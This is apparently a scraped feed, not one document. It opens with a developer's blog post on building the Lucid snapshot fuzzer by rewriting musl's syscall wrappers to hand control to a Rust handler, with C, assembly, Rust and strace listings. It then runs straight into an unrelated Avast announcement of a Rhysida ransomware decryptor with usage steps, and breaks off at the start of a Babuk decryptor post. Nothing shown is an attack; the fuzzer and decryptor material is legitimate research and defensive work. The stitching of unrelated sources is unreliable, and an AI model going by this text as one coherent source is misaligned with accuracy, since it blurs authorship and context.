Musl is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc which is a monstrosity an affront to God. Importantly, Musl is reputationally great for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.

In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.

Baby Steps

Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:

#include <stdio.h>
#include <unistd.h>
#include <lucid.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters == 5) { break; }
    }

    printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}

The program will just tell us it’s argument count, each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?

Execution Context Tracking

Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not its running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs so we need a vehicle do that.

What I’ve done is I’ve just created my own header file and placed it in Musl called lucid.h. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a lucid_ctx data structure, and we’ve also created a global instance of one called g_lucid_ctx:

// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Pointer to the global execution context, if running inside Lucid, this will
// point to the a struct lucid_ctx_t inside the Fuzzer 
lucid_ctx_t *g_lucid_ctx;

Program Start Under Lucid

So in Lucid’s main function right now we do the following:

  • Load Bochs
  • Create an execution context
  • Jump to Bochs’ entry point and start executing

When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called _dlstart_c located in the source file dlstart.c. Right now, we create that global execution context in Lucid on the heap, and then we pass that address in arbitrarily chosen r15. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:

pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
    // rdx: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // rax: arbitrarily used as a jump target to the program entry
    //
    // rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // r15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) bochs.rsp,
            in(reg) Box::into_raw(context),
            in("rax") bochs.entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

So when we jump to Bochs entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are those additions I made to Musl’s start routine:

hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
	// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
	// so we can just do this here. That function logic clobbers only a few
	// registers, so we can have the Lucid loader pass the address of the 
	// Lucid context in r15, this is obviously not the cleanest solution but
	// it works for our purposes
	size_t r15;
	__asm__ __volatile__(
		"mov %%r15, %0" : "=r"(r15)
	);

	// If r15 was not 0, set the global context address for the g_lucid_ctx that
	// is in the Rust fuzzer
	if (r15 != 0) {
		g_lucid_ctx = (lucid_ctx_t *)r15;

		// We have to make sure this is true, we rely on this
		if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
			__asm__ __volatile__("int3");
		}
	}

	// We didn't get a g_lucid_ctx, so we can just run normally
	else {
		g_lucid_ctx = (lucid_ctx_t *)0;
	}

When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.

Lobotomizing Musl Syscalls

Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:

static __inline long __syscall0(long n)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall1(long n, long a1)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall2(long n, long a1, long a2)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
						  : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall3(long n, long a1, long a2, long a3)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10): "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

For syscalls, there is a well defined calling convention. Syscalls take a “syscall number” which determines what syscall you want in eax, then the next n parameters are passed in via the registers in order: rdi, rsi, rdx, r10, r8, and r9.

This is pretty intuitive but the syntax is a bit mystifying, like for example on those __asm__ __volatile__ ("syscall" lines, it’s kind of hard to see what it’s doing. Let’s take the most convoluted function, __syscall6 and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:

  • unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a : and then "=a(ret)", this first set of parameters after the initial colon is to indicate output parameters. We are saying please store the result in eax (symbolized in the syntax as a) into the variable ret.
  • The next series of params after the next colon are input parameters. "a"(n) is saying, place the function argument n, which is the syscall number, into eax which is symbolized again as a. Next is store a1 in rdi, which is symbolized as D, and so forth
  • Arguments 4-6 are placed in registers above, for instance the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. And then later we see "r"(r10) says input the variable r10 into a general purpose register (which is already satisfied).
  • The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.

With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall, the register utilization differs. So when we call __syscall6 and pass its arguments, each argument is stored in the following register:

  • nrax
  • a1rdi
  • a2rsi
  • a3rdx
  • a4rcx
  • a5r8
  • a6r9

So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that syscall instruction and instead call into Lucid.

Conditionally Calling Into Lucid

So we need a way in these function bodies to call into Lucid instead of emit syscall instructions. To do so we need to define our own calling convention, for now I’ve been using the following:

  • r15: contains the address of the global Lucid execution context
  • r14: contains an “exit reason” which is just an enum explaining why we are context switching
  • r13: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch
  • r12: stores the address of the “exit handler” which is the function to call to context switch

This will no doubt change some as we add more features/functionality. I should also note that it is the functions responibility to preserve these values according to the ABI, so the function caller expects that these won’t change during a function call, well we are changing them. That’s ok because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change, what the compiler is going to do now is before it executes any code, it’s going to push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So we’re free to use them.

So to alter the functions, I changed the function logic to first check if we have a global Lucid execution context, if we do not, then execute the normal Musl function, you can see that here as I’ve moved the normal function logic out to a separate function called __syscall6_original:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }

However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance to what we are expecting there when we context-switch to Lucid.

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);

Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the syscall instruction with call r12, calling our exit handler as if it’s a normal function:

__asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;

So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are setup as if we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!

Implementing a Context Switch

The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:

extern "C" { fn exit_handler(); }
global_asm!(
    ".global exit_handler",
    "exit_handler:",

So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context register bank:

#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
    pub rax:    usize,
    rbx:        usize,
    rcx:        usize,
    pub rdx:    usize,
    pub rsi:    usize,
    pub rdi:    usize,
    rbp:        usize,
    rsp:        usize,
    pub r8:     usize,
    pub r9:     usize,
    pub r10:    usize,
    r11:        usize,
    r12:        usize,
    r13:        usize,
    r14:        usize,
    r15:        usize,
}

We can save the register values then by doing this:

// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",

This will save the register values to memory in the memory bank for preservation. Next, we’ll want to preserve the CPU’s flags, luckily there is a single instruction for this purpose which pushes the flag values to the stack called pushfq.

We’re using a pure assembly stub right now but we’d like to start using Rust at some point, that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function though, we need to set up the register values to adhere to the function calling ABI remember. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in r15 and r14 respectively remember. So we can simply place those into the registers used for passing function arguments and call into a Rust function called lucid_handler now.

// Save the CPU flags
"pushfq",

// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI

// At this point, we've been called into by Bochs, this should mean that 
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",

So now, we are free to execute real Rust code! Here is lucid_handler as of now:

// This is where the actual logic is for handling the Bochs exit, we have to 
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
    // We have to make sure this bad boy isn't NULL 
    if context.is_null() {
        println!("LucidContext pointer was NULL");
        fatal_exit();
    }

    // Ensure that we have our magic value intact, if this is wrong, then we 
    // are in some kind of really bad state and just need to die
    let magic = LucidContext::ptr_to_magic(context);
    if magic != CTX_MAGIC {
        println!("Invalid LucidContext Magic value: 0x{:X}", magic);
        fatal_exit();
    }

    // Before we do anything else, save the extended state
    let save_inst = LucidContext::ptr_to_save_inst(context);
    if save_inst.is_err() {
        println!("Invalid Save Instruction");
        fatal_exit();
    }
    let save_inst = save_inst.unwrap();

    // Get the save area
    let save_area =
        LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);

    if save_area == 0 || save_area % 64 != 0 {
        println!("Invalid Save Area");
        fatal_exit();
    }

    // Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

    // Try to convert the exit reason into BochsExit
    let exit_reason = BochsExit::try_from(exit_reason);
    if exit_reason.is_err() {
        println!("Invalid Bochs Exit Reason");
        fatal_exit();
    }
    let exit_reason = exit_reason.unwrap();
    
    // Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }
}

There are a few important pieces here to discuss.

Extended State

Let’s start with this concept of the save area. What is that? Well, we already have a general purpose registers saved and our CPU flags, but there is what’s called an “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? It’s hard to say, we don’t know wtf Bochs will do, it might count on these to be preserved across function calls so I thought we’d go ahead and do it.

To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for at least two saving instructions to see if they’re available, if they’re not, for now, we don’t support anything else. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the approriate extended state saving function. This works because we don’t use any of the extended state in lucid_handler yet so it’s preserved still. You can see how I checked during context initialization here:

pub fn new() -> Result<Self, LucidErr> {
        // Check for what kind of features are supported we check from most 
        // advanced to least
        let save_inst = if std::is_x86_feature_detected!("xsave") {
            SaveInst::XSave64
        } else if std::is_x86_feature_detected!("fxsr") {
            SaveInst::FxSave64
        } else {
            SaveInst::NoSave
        };

        // Get save area size
        let save_size: usize = match save_inst {
            SaveInst::NoSave => 0,
            _ => calc_save_size(),
        };

The way this works is the processor takes a pointer to memory where you want it saved and also how much you want saved, like what specific states. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:

// Standalone function to calculate the size of the save area for saving the 
// extended processor state based on the current processor's features. `cpuid` 
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  
fn calc_save_size() -> usize {
    let save: usize;
    unsafe {
        asm!(
            "push rbx",
            "mov rax, 0xD",
            "xor rcx, rcx",
            "cpuid",
            "pop rbx",
            out("rax") _,       // Clobber
            out("rcx") save,    // Save the max size
            out("rdx") _,       // Clobbered by CPUID output (w eax)
        );
    }

    // Round up to the nearest page size
    (save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

I page align the result and then map that memory during execution context initialization and save the memory address to the execution state. Now at run time in lucid_handler we can save the extended state:

// Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the exit_handler assembly stub:

// Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

Let’s see how we handle syscalls.

Implementing Syscalls

When we run the test program normally, not under Lucid, we get the following output:

Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0

And when we run it with strace, we can see what syscalls are made:

execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++

We see that the first two syscalls are involved with process creation, we don’t need to worry about those our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like set_tid_address, ioctl, and writev. We don’t worry about exit_group yet as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.

So we can use our saved register bank information to extract the syscall number from eax and dispatch to the appropriate syscall function! You can see that logic here:

// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
    // Get a handle to the register bank
    let bank = LucidContext::get_register_bank(context);

    // Check what the syscall number is
    let syscall_no = (*bank).rax;

    // Get the syscall arguments
    let arg1 = (*bank).rdi;
    let arg2 = (*bank).rsi;
    let arg3 = (*bank).rdx;
    let arg4 = (*bank).r10;
    let arg5 = (*bank).r8;
    let arg6 = (*bank).r9;

    match syscall_no {
        // ioctl
        0x10 => {
            //println!("Handling ioctl()...");
            // Make sure the fd is 1, that's all we handle right now?
            if arg1 != 1 {
                println!("Invalid `ioctl` fd: {}", arg1);
                fatal_exit();
            }

            // Check the `cmd` argument
            match arg2 as u64 {
                // Requesting window size
                libc::TIOCGWINSZ => {   
                    // Arg 3 is a pointer to a struct winsize
                    let winsize_p = arg3 as *mut libc::winsize;

                    // If it's NULL, return an error, we don't set errno yet
                    // that's a weird problem
                    // TODO: figure out that whole TLS issue yikes
                    if winsize_p.is_null() {
                        (*bank).rax = usize::MAX;
                        return;
                    }

                    // Deref the raw pointer
                    let winsize = unsafe { &mut *winsize_p };

                    // Set to some constants
                    winsize.ws_row      = WS_ROW;
                    winsize.ws_col      = WS_COL;
                    winsize.ws_xpixel   = WS_XPIXEL;
                    winsize.ws_ypixel   = WS_YPIXEL;

                    // Return success
                    (*bank).rax = 0;
                },
                _ => {
                    println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
                    fatal_exit();
                }
            }
        },
        // writev
        0x14 => {
            //println!("Handling writev()...");
            // Get the fd
            let fd = arg1 as libc::c_int;

            // Make sure it's an fd we handle
            if fd != STDOUT {
                println!("Unhandled writev fd: {}", fd);
            }

            // An accumulator that we return
            let mut bytes_written = 0;

            // Get the iovec count
            let iovcnt = arg3 as libc::c_int;

            // Get the pointer to the iovec
            let mut iovec_p = arg2 as *const libc::iovec;

            // If the pointer was NULL, just return error
            if iovec_p.is_null() {
                (*bank).rax = usize::MAX;
                return;
            }

            // Iterate through the iovecs and write the contents
            green!();
            for i in 0..iovcnt {
                bytes_written += write_iovec(iovec_p);

                // Update iovec_p
                iovec_p = unsafe { iovec_p.offset(1 + i as isize) };
            }
            clear!();

            // Update return value
            (*bank).rax = bytes_written;
        },
        // nanosleep
        0x23 => {
            //println!("Handling nanosleep()...");
            (*bank).rax = 0;
        },
        // set_tid_address
        0xDA => {
            //println!("Handling set_tid_address()...");
            // Just return Boch's pid, no need to do anything
            (*bank).rax = BOCHS_PID as usize;
        },
        _ => {
            println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
            fatal_exit();
        }
    }
}

That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, but I bet we’re going to have to figure out how to deal with things like files and such when using Bochs, but that’s a different time. Now all there is to do, after setting the return code via rax, is return back to the exit_handler stub and back to Bochs gracefully.

Returning Gracefully

    // Restore the flags
    "popfq",

    // Restore the GPRS
    "mov rax, [r13 + 0x0]",
    "mov rbx, [r13 + 0x8]",
    "mov rcx, [r13 + 0x10]",
    "mov rdx, [r13 + 0x18]",
    "mov rsi, [r13 + 0x20]",
    "mov rdi, [r13 + 0x28]",
    "mov rbp, [r13 + 0x30]",
    "mov rsp, [r13 + 0x38]",
    "mov r8, [r13 + 0x40]",
    "mov r9, [r13 + 0x48]",
    "mov r10, [r13 + 0x50]",
    "mov r11, [r13 + 0x58]",
    "mov r12, [r13 + 0x60]",
    "mov r13, [r13 + 0x68]",
    "mov r14, [r13 + 0x70]",
    "mov r15, [r13 + 0x78]",

    // Return execution back to Bochs!
    "ret"

We restore the CPU flags, restore the general purpose registers, and then we simple ret like we’re done with the function call. Don’t forget we already restored the extended state before within lucid_context before returning from that function.

Conclusion

And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:

[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7

Next Up?

Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!

Decrypted: Rhysida Ransomware

In October 2023, we published a blog post containing technical analysis of the Rhysida ransomware. What we intentionally omitted in the blog post was that we had been aware of a cryptographic vulnerability in this ransomware for several months and, since August 2023, we had covertly provided victims with our decryption tool. Thanks to our collaboration with law enforcement units, we were able to quietly assist numerous organizations by decrypting their files for free, enabling them to regain functionality. Given the weakness in Rhysida ransomware was publicly disclosed recently, we are now publicly releasing our decryptor for download to all victims of the Rhysida ransomware.

The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations.

Usage of the Decryptor

Please, read the following instructions carefully. The rate of success depends on them.

Several parameters of the infected PC affect the encryption (and decryption) of the files:

  • Set of the drive letters
  • Order of files
  • Number of CPU cores
  • Bitness of the executed ransomware sample
  • Format of files before encryption

For these reasons, the following rules must be obeyed while decrypting files:

  • The decryptor must be executed on the same machine where the files were encrypted
  • Password cracking process must be executed on the same machine where the files were encrypted
  • No files from another machine can be copied to the machine where the decryption process is performed
  • Text files (source files, INI files, XML, HTML, …) must have certain minimal size to be decryptable

64-bit samples of the Rhysida encryptors are far more common. For that reason, default configuration of the decryptor assumes 64-bit encryptor. If you are sure that it was 32-bit version (for example, if you have 32-bit operating system), the decryptor can be switched to 32-bit mode by using the following command line parameter:

avast_decryptor_rhysida.exe /ptr:32

If you want to verify whether the decryption process will work without changing the files, you may use the “testing mode” of the decryptor. This mode is activated by the following command line parameter:

avast_decryptor_rhysida.exe /nodecrypt

The Rhysida decryptor also relies on the known file format. Common file formats, such as Office documents, archives, pictures, and multimedia files are already covered. If your encrypted data includes valuable documents in less common or proprietary formats, please, contact us at [email protected]. We can analyze the file format and if possible, we add its support to the decryptor.

Steps to Use the Decryptor

  1. Download the decryptor here.
  2. Run the decryptor. Unless you need one or more command line modifications, you can simply run it by clicking on the downloaded file.
  3. On the initial page, you must confirm that you are running the decryptor on the same PC where the files were encrypted. Click Yes, then the Next button when you are ready to start.
  1. Next page shows the list of drive letters on the PC. You may notice that it is in reverse order. Please, keep it as it is and click “Next.”
  1. The next screen requires you to enter an example of an encrypted file. In most cases, the decryptor picks the best file available for the password cracking process.
  1. The next page is where the password cracking process takes place. Click Start when you are ready to begin. This process usually only takes a few seconds but will require a large amount of system memory.
  1. Once the password is found, you can continue to decrypt all the encrypted files on your PC by clicking Next:
  1. On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This choice is selected by default, which we recommend. After clicking Decrypt the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

For questions or comments about the Avast decryptor, email [email protected].

The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.

Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police

Babuk, an advanced ransomware strain, was publicly discovered in 2021. Since then, Avast has blocked more than 5,600 targeted attacks, mostly in Brazil, Czech Republic, India, the United States, and Germany.

